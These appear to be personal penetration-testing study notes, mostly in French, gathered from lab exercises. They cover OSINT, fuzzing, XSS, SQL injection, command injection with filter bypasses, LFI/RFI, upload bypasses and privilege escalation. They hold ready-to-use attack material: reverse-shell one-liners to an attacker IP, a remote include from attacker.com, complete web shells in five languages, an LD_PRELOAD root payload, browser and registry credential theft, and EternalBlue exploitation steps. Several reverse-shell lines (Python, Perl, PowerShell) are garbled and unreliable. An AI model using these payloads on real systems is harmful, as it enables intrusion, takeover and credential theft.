VirusTotal pour voir si le site est fiable, peut etre utiliser pour des fichiers aussi
OpenPhish pour voir les menaces de phishing en temps reel
PhishTank on peut y reporter et verifier si un site est un phishing
emkei.cz <=
msfvenom
Direction: Definir le but, la portee et la priorite de l'operation
Collection: Collecter des infos (sites webs, reseaux sociaux, bdd publique etc.)
Analyses: Examen detaille des infos collectees
Evaluation: Evaluer et interpreter les indices
Dissemination: Partager les indices et les rapports avec les autres.
Dork Description Usage Example 1 site: Searches within a specific site. site:example.com 2 filetype: Searches for a specific file type. filetype:pdf 3 intitle: Searches for pages with specific words in the title. intitle:"login" 4 inurl: Searches for pages with specific words in the URL. inurl:admin 5 cache: Displays pages stored in Google's cache. cache:example.com 6 link: Finds pages that link to a specific page. link:example.com 7 related: Finds sites similar to a specific site. related:example.com 8 intext: Searches for specific words within the page text. intext:"password" 9 allintitle: Searches for pages with all specified words in the title. allintitle:login admin 10 allinurl: Searches for pages with all specified words in the URL. allinurl:admin login 11 allintext: Searches for pages with all specified words in the text. allintext:username password 12 define: Searches for the definition of a specific word. define:OSINT 13 "keyword" Searches for an exact phrase. "admin login" 14 -keyword Excludes pages containing a specific word. password -example 15 OR Searches for pages containing either of two words. login OR signup 16 * Acts as a wildcard for any word. intitle:"admin *" 17 .. Searches for numbers within a range. filetype:pdf 2020..2022 18 info: Displays information about a specific site. info:example.com 19 maps: Shows the map of a specific location. maps:New York 20 stocks: Shows stock information for a specific company. stocks:GOOG
Google Hacking Database (GHDB)
instantusername.com pour trouver les reseaux sociaux ou un username est utilise
Sherlock idem
RocketReach pourtrouver des infos professionnelles comme des mails, numero de telephomne, reseaux sociaux...
Reverse Image de google
Finding Similar Human Faces pour trouver des images avec une reconnaissance faciale
exiftool
whois
DNSdumpster donne des infos sur le domaine
host
dig
Shodan pour scanner les IoT
Hunter pour trouver et verifier des adresses mails
email checker pour verifier la robustesse d'une adresse mail
Ahmia Pour trouver des sites en .onion
Deep Web Technologies une plateforme pour chercher des ressources academic sur le dep web
Voir OSINT Framework
msfconsole : pour lancer metasploit
search : pour chercher un module
use : pour selectionner un module
info : pour avoir des details sur un module
options : pour voir comment doit fonctionner le module
show : pour voir d'autres infos
set : pour changer une valeur d'option
get : pour voir la valeur d'une option
unset : pour reinitialiser une option
run / exploit : pour lancer le module
back : pour quitter un module
sessions : pour les sessions actives
RHOST : machine cible
LHOST : machine actuelle
show evasion : pour voir les modules d'evasion
On peut faire de la post exploitation
il faut ouvrir une nouvelle session (ctrl+z) et on peut use post/linux/gather/enum_system
Browser extension : Wappalyzer et WhatRuns pour voir les techno utilisees
DNSdumpster (en ligne)
host
dig
cnesys scan: permet de voir des certificats ssl
crt.sh: idem
gobuster dns -d example.com -w /path/to/wordlist
gobuster vhost -u https://example.com -w /path/to/wordlist
ffuf -w /path/to/wordlist -u https://example.com -H 'Host: FUZZ.example.com' pour les vhost
ffuf -w /path/to/vhost/wordlist -u http://example.com -H 'Host: FUZZ.example.com' -fs 4242 fs pour filtrer les reponses HTTP par taille
gobuster dns -d example.com -w /path/to/wordlist
gobuster vhost -u https://example.com -w /path/to/wordlist
gobuster vhost -u https://example.com -w /path/to/wordlist --exclude-length 1542
gobuster dir -u http://example.com -w /path/to/wordlist.txt
theharvester: outils d'osint recoltant des adresses mails, sous domaines, adresses IP etc.
regarder le robots.txt et le sitemap.xml
gobuster
ffuf -u http://target.com/FUZZ -w <wordlist>
dirb
feroxbuster -u <url> -w <wordlist>
ffuf -u https://example.com/FUZZ -w /path/to/wordlist.txt
gobuster dir -u https://example.com -w /path/to/wordlist.txt -x php,html,asp
ffuf -u https://FUZZ.example.com -w /path/to/wordlist.txt -H "Host: FUZZ.example.com"
sublist3r -d example.com -o subdomains.txt
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w /path/to/wordlist.txt
gobuster vhost -u https://example.com -w /path/to/wordlist.txt
ffuf -u "https://example.com/page.php?param=FUZZ" -w /path/to/wordlist.txt
ffuf -u "https://example.com/login.php" -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -H "Content-Type: application/x-www-form-urlencoded"
sessionStorage
localStorage
XMLHttpRequest
document.cookie
https://example.com/home?search=<script>alert('XSS')</script>
<script>alert(1)</script>
<h1 style="color:green;">TEST</h1>
POST /index.php HTTP/1.1
Host: example.com
Cookie: PHPSESSID=jl5kamgcplionfan0kkjhcujh3
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
message=<script>alert(document.cookie)</script>
Se connecter a une db: mysql -u root -p
voir la bd: show databases;
selectionner une db: use db_name;
voir les tables: show tables;
inserer dans une table: INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...);
commentaire: -- ou # ou /* */
' OR 1=1#
FORD' UNION SELECT USER(),DATABASE(),VERSION(),4 #
-u: pour specifier la cible
--data: pour specifier les donnees POST a envoyer
-p: pour specifier le champs a tester
sqlmap -u "https://prepared-smasher.europe1.hackviser.space/login.php" --data="username=test&password=test" -p "username"
--current-user: pour detecter l'utilisateur de la bdd actif
--current-db: pour detecter la bdd utilisee
--passwords: pour detecter les hash de mdp de la bdd utilisateurs
--dbs: pour lister toutes les bdd
--tables: pour lister les tables (a utiliser avec -D pour specifier la bdd)
--columns: pour lister les colonnes d'une table (a utiliser avec -D pour specifier la bdd)
--dump: pour recuperer les donnees de la bdd (idem avec -D)
On peut injecter des commandes dans le header d'une requete:
User-Agent: '; sleep 10'
machine attaquante: nc -lvp 4444
machine cible:
Netcat: nc -e /bin/sh IP_MACHINE_ATTAQUANTE 4444
Bash: bash -c 'bash -i >& /dev/tcp/IP_MACHINE_ATTAQUANTE/4444 0>&1'
Python: import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock.SOCK_STREAM.os.connect(("IP_MACHINE_ATTAQUANTE",4444));os.dup2(s.client_fileno(),0); os.dup2(s.client_fileno(),1); os.dup2(s.client_fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Perl: perl -e 'use Socket;$= "IP_MACHINE_ATTAQUANTE; =4444;socket(S,PF_INET,SOCK_STREAM,getby_idc_chars("Tcp"));if(connect(S,sockaddr.("Plxp4.utfatossf; !x)&&=tf9fec(@ipv_pl_TE_(inputs), plt E);;&
PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP_MACHINE_ATTAQUANTE/4444 0>&1'"); ?>
Powershell: powershell -c rival=$client = ....7180V4_$$client9 open("IP_MACHINE_ATTAQUANTE");$stream= = elf.]$bytes=..ticks)$ev.;bytes.length=);.)while- $ases -.Name "- aysiiREBoundingClientRect..0'{8;client_Close());}}
SSTI : {{['nc -nlvp 4444 -e /bin/bash']|filter('system')}} Puis nc -nv IP_MACHINE_CIBLE 4444
Certaines applications peuvent retirer les whitespaces, on peut le contourner comme suit: ls${IFS}/etc/passwd avec ${IFS}
Certaines commandes peuvent etre bloquees si elles sont blacklist, on peut contourner avec les quotes: w'h'o'am'i ou w"h"o"am"i
Autres: who$()ami, who`echo am`i
git clone https://github.com/commixproject/commix.git commix
Specifier une url: --url="http://example.com/index.php"
Specifier des parametres: --data="command=test"
Methode utilisee: --method=POST
http://example.com/index.php?page=../../../../etc/passwd
GET /index.php HTTP/1.1 User-Agent: <?php system('ls'); ?>
php filter: http://example.com/index.php?page=php://filter/convert.base64-encode/resource=home.php
puis ensuite de decoder le retour de la requete
Si le site block les path traversal: ../ On peut utiliser ....//
On peut utiliser l'url encoding: ../ devient %2e%2e%2f voir aussi le double encoding si trop robuste
nullbyte injection: https://example.com/index.php?language=/etc/passwd%00
https://example.com/index.php?page=https://attacker.com/shell.php
Essayer des types de fichiers differents (jpg, pdf, php, exe etc.)
Injecter du code dans des images
Modifier le MIME du fichier
Upload de gros fichiers volumineux
MIME type: on change le Content-Type text/php en image/png
POST / HTTP/1.1
Host: sunny-zombie.europe1.hackviser.space
Content-Length: 354
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6CZGdFhAqm0hjeeA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: image/png
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary6CZGdFhAqm0hjeeA--
Magic Header Bypass: on rajoute GIF89a; faisant passe comme un gif
POST / HTTP/1.1
Host: included-aquagirl.europe1.hackviser.space
Content-Length: 354
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiXbT96o7HsUdrZoy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: text/php
GIF89a;
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryiXbT96o7HsUdrZoy--
file extension bypass: utiliser differents extensions executables:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .phar
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
PHP
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>http://example.com/shell.php?cmd=whoami
ASP
<%
If Request.QueryString("cmd") <> "" Then
Set objShell = Server.CreateObject("WScript.Shell")
Set objExec = objShell.Exec(Request.QueryString("cmd"))
Set objOutput = objExec.StdOut
Response.Write("<pre>" & objOutput.ReadAll() & "</pre>")
End If
%>JSP
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
String s = "";
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = sI.readLine()) != null) {
out.println(s);
}
}
%>PYTHON
import os
from flask import Flask, request
app = Flask(__name__)
@app.route('/shell', methods=['GET'])
def shell():
cmd = request.args.get('cmd')
if cmd:
output = os.popen(cmd).read()
return f"<pre>{output}</pre>"
return "<pre>No command provided</pre>"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)NODE.JS
const express = require('express');
const { exec } = require('child_process');
const app = express();
app.get('/shell', (req, res) => {
const cmd = req.query.cmd;
if (cmd) {
exec(cmd, (error, stdout, stderr) => {
if (error) {
res.send(`<pre>${stderr}</pre>`);
return;
}
res.send(`<pre>${stdout}</pre>`);
});
} else {
res.send('<pre>No command provided</pre>');
}
});
app.listen(8080, '0.0.0.0', () => {
console.log('Web shell running on port 8080');
});Intruder is designed within Burp Suite to create customized attacks to automatically test security vulnerabilities. It is particularly used for payload trials, fuzzing, and brute-force attacks in form or parameter fields. In the Community version, its slow scanning speed results in lower performance.
Repeater is a tool that allows manual modification and resending of requests. This feature is important during security testing to observe how the target application responds. Quickly viewing the results of changes made to requests can contribute to identifying security vulnerabilities.
Sequencer is a tool used to test the security of session tokens and other data used in web applications. Sequencer analyzes the randomness and unpredictability of these tokens, thereby assessing the likelihood that an attacker could carry out attacks such as session hijacking.
The Decoder tool in Burp Suite is used to analyze and transform encoded, encrypted, or obfuscated data. This tool simplifies the analysis of data encountered during security testing. In addition to decoding, it also has capabilities to encode or encrypt data using existing methods.
Comparer enables the comparison and analysis of differences between two or more data pieces. This tool is particularly useful during security testing to identify subtle differences between similar operations or to understand the structural differences between two different session tokens. Analyses performed with Comparer can assist in identifying security vulnerabilities and provide a better understanding of how an application behaves.
The Logger tool in Burp Suite keeps a record of all requests and responses that occur while Burp Suite is being used. This is crucial for examining the actions taken during security testing, debugging, and identifying potential security vulnerabilities.
Organizer is a tool designed to help systematically store findings, notes, and observations obtained during the testing process. This feature simplifies the management and reporting of information gathered about the application or systems being tested.
liste des process actifs: ps aux | grep root
users en ligne: ps au
contenu du repertoire ssh: ls -l .ssh
voir l'historique des commandes: history
lister les privileges de l'utilisateur: sudo -l
voir des hashs de mdp: cat /etc/shadow ou cat /etc/passwd
voir les cronjob: cat /etc/crontab
autres stockage: lsblk
trouver les repertoires writables: find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
trouver les fichiers writables: find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Si on a access avec sudo -l a python3 alors on peut executer cette commande pour obtenir un bash sous root: python3 -c 'import os; os.system("/bin/bash")'
python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions on misconfigured systems
exemple: ici find a le bit s pour le suid. Si on le lance en executant un bash on obtient un bash root
user@hackerbox:~$ ls -l /usr/bin/find
-rwsr-xr-x 1 root root 311008 Jan 9 2021 /usr/bin/find
user@hackerbox:~$ find . -exec /bin/bash -p \; -quit
rootđź’€hackerbox:~# id
uid=0(root) gid=0(root) groups=0(root)When capabilities are set for a program, it means the program can perform certain actions that it couldn't without those capabilities.
setcap cap_net_bind_service=+ep /usr/bin/vim
cap_sys_admin Allows actions with administrative privileges, such as modifying system files or system settings. cap_sys_chroot Allows changing the root directory of the current process, granting access to otherwise inaccessible files and directories. cap_sys_ptrace Allows attaching to and debugging other processes, granting access to sensitive information or altering other processes' behavior. cap_sys_nice Allows increasing or decreasing the priority of processes, granting access to resources that would otherwise be restricted. cap_sys_time Allows changing the system clock, potentially manipulating timestamps or causing other processes to behave unexpectedly. cap_sys_resource Allows altering system resource limits, such as the maximum number of open file descriptors or the maximum amount of allocated memory. cap_sys_module Allows loading and unloading kernel modules, potentially altering the operating system's behavior or gaining access to sensitive information. cap_net_bind_service Allows binding to network ports, potentially granting access to sensitive information or performing unauthorized actions. cap_dac_override Allows bypassing file permissions to access files. cap_sys_rawio Grants the authority to perform I/O operations. cap_net_raw Allows processes to create RAW and PACKET sockets. cap_setuid Allows setting the effective user ID of the spawned process (including the root user ID). cap_setgid Allows setting the effective group ID, which can be used to gain the privileges of another group (including the root group).
whereis getcap
/usr/sbin/getcap -r / 2>/dev/null
The shared libraries required for a binary to run can be viewed using the ldd utility: ldd /bin/ping
Exemple complet:
Ici on voit qu'on peut executer sys_backup en tant que root mais comme il y a un chemin absolu, on ne peut pas s'en servir pour monter en privilege.
user@hackerbox:~$ sudo -l
Matching Defaults entries for user on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User user may run the following commands on debian:
(ALL) NOPASSWD: /usr/local/bin/sys_backupOn va donc utiliser le LD_PRELOAD:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0, 0, 0);
system("/bin/bash -p");
}gcc -fPIC -shared -nostartfiles -o /tmp/escalate.so escalate.c
on devient root avec la commande: sudo LD_PRELOAD=/tmp/escalate.so /usr/local/bin/sys_backup
screen 4.5.0
Metasploit Framework Linux Exploit Suggester
Get-ComputerInfo
Get-NetIPAddress
ipconfig
arp -a
Get-LocalUser
Get-LocalGroup
cat (Get-PSReadlineOption).HistorySavePath
Get-WinEvent -LogName "Windows PowerShell"
Get-Clipboard
PS C:\Users\user\Desktop> .\accesschk64.exe
chercher le mot ppasword et filtrer avec .conf
cd "C:\Program Files"
Get-ChildItem -Recurse -ErrorAction SilentlyContinue | Select-String "password" -List | select path | where path -like "*.conf"Voir les mdp et cles de services:
Get-ItemProperty "HKCU:\Software\ORL\WinVNC3\Password"
Get-ItemProperty "HKCU:\Software\TightVNC\Server" Password
Get-ItemProperty "HKLM:\Software\TightVNC\Server" Password
Get-ItemProperty "HKCU:\Software\OpenSSH\Agent\Keys"
Get-ItemProperty "HKLM:\Software\OpenSSH\Agent\Keys"Browser mdp:
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:<MASTERKEY>
machine attaquante: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=4343 -f exe -o reverse.exe
machine attaquante: python -m http.server
machine cible: Invoke-WebRequest -Uri "http://<IP ADDRESS>:8000/reverse.exe" -OutFile .\Desktop\reverse.exe
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost <IP>
msf exploit(ms17_010_eternalblue) > runmsf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST <IP>
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > exploitmsf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit